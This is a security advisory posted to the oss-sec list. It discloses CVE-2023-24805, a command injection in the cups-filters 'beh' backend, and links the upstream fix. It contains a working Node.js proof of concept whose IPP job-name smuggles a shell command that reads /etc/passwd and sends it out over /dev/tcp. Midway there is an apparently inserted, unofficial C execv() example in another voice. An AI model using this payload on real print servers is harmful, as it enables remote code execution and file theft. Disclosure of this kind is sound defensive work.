oss-sec mailing list archives

CVE-2023-24805: RCE in cups-filters, beh CUPS backend


From: Till Kamppeter <till.kamppeter () gmail com>
Date: Wed, 17 May 2023 11:30:11 +0200

The following bug got reported to OpenPrinting's GitHub, repo cups-filters, as a private (security) issue report:

https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-gpxc-v2m8-fr3x

Summary

If you use "beh" to create an accessible network printer, this security vulnerability can cause remote code execution.

Details

cups-filters/backend/beh.c, line 288 in commit 5c9498a:

  retval = system(cmdline) >> 8;

// (context: argv = beh <job-id> <user> <title> <copies> <options> [file])
     snprintf(cmdline, sizeof(cmdline),
              "%s/backend/%s '%s' '%s' '%s' '%s' '%s' %s",
              cups_serverbin, scheme, argv[1], argv[2], argv[3],
              ...
              (argc == 6 ? "1" : argv[4]),
              argv[5], filename);
     ...
     retval = system(cmdline) >> 8;

The system function will be called here to execute the command, and the user and title parameters are user-controlled and unsanitized.

PoC

Start a beh service:

     lpadmin -p myprinter -E -v beh:/1/3/5/socket://printer:9100

Exploit (uses the ipp module from https://github.com/williamkapke/ipp):

var ipp = require('ipp');
var PDFDocument = require('pdfkit');
var concat = require("concat-stream");

var doc = new PDFDocument({margin:0});
doc.text("1.pdf", 0, 0);

doc.pipe(concat(function (data) {
  var printer = ipp.Printer("http://127.0.0.1:6310/printers/myprinter");
  var msg = {
    "operation-attributes-tag": {
      // requesting-user-name and job-name end up as beh's <user> and
      // <title> arguments, which are interpolated into the system() command line
      "requesting-user-name": "Bumblebee",
      "job-name": "';env; bash -c \"/usr/bin/cat ${PWD}etc/${PWD}/passwd > ${PWD}dev${PWD}tcp${PWD}127.0.0.1${PWD}1337\";'' #.pdf",
      "document-format": "application/pdf"
    },
    "job-attributes-tag": {
      "media-col": {
        "media-source": "tray-2"
      }
    },
    data: data
  };
  printer.execute("Print-Job", msg, function(err, res){
    console.log(err);
    console.log(res);
  });
}));
doc.end();


The report got assigned CVE-2023-24805.

A fix is to use execv() instead of system() and was proposed as a pull request attached to the bug report.
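To illustrate that fix direction, here is an added example (my own code, not the cups-filters pull request): a hypothetical run_backend() that hands each job field to the backend as its own argv element via execv(), so no shell ever parses the title or user name; it also captures the child's stdout so the caller can check what the backend actually received.

```c
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Hypothetical stand-in for beh's snprintf()+system(): start the real
 * backend with execv(), so each job field is one argv element and
 * characters such as ' ; $ in a title are data, never shell syntax.
 * The child's stdout is copied into out[] so callers can check what the
 * backend received. Returns the exit status (127 if exec failed), -1 on
 * local error. */
int run_backend(const char *path, const char *scheme, const char *job_id,
                const char *user, const char *title, const char *copies,
                const char *options, const char *filename,
                char *out, size_t outlen)
{
    char *argv[8] = { (char *)scheme, (char *)job_id, (char *)user,
                      (char *)title, (char *)copies, (char *)options };
    int fd[2], status, argc = 6;
    size_t used = 0;
    ssize_t n;

    if (filename && *filename)      /* no file: backend reads the job on stdin */
        argv[argc++] = (char *)filename;
    argv[argc] = NULL;
    if (!out || outlen == 0 || pipe(fd) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }
    if (pid == 0) {                 /* child: stdout -> pipe, then exec */
        close(fd[0]);
        dup2(fd[1], STDOUT_FILENO);
        close(fd[1]);
        execv(path, argv);          /* argv[0] is the scheme, as in beh */
        _exit(127);                 /* only reached if execv() failed */
    }
    close(fd[1]);
    while ((n = read(fd[0], out + used, outlen - used - 1)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fd[0]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Pointing it at /bin/echo with a constructed title such as "'; env; #" shows the title arriving verbatim as one argument, which is exactly what the system() version could not guarantee.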

https://github.com/OpenPrinting/cups-filters-ghsa-gpxc-v2m8-fr3x/pull/1

The pull request is merged now into

https://github.com/OpenPrinting/cups-filters (branch "master")

as commit

https://github.com/OpenPrinting/cups-filters/commit/8f274035756

and the fix is also ported to the "1.x" branch of cups-filters, as commit

https://github.com/OpenPrinting/cups-filters/commit/93e60d3df35

The fix will also be included in the upcoming releases, 2.0.0 and 1.28.18.

   Till
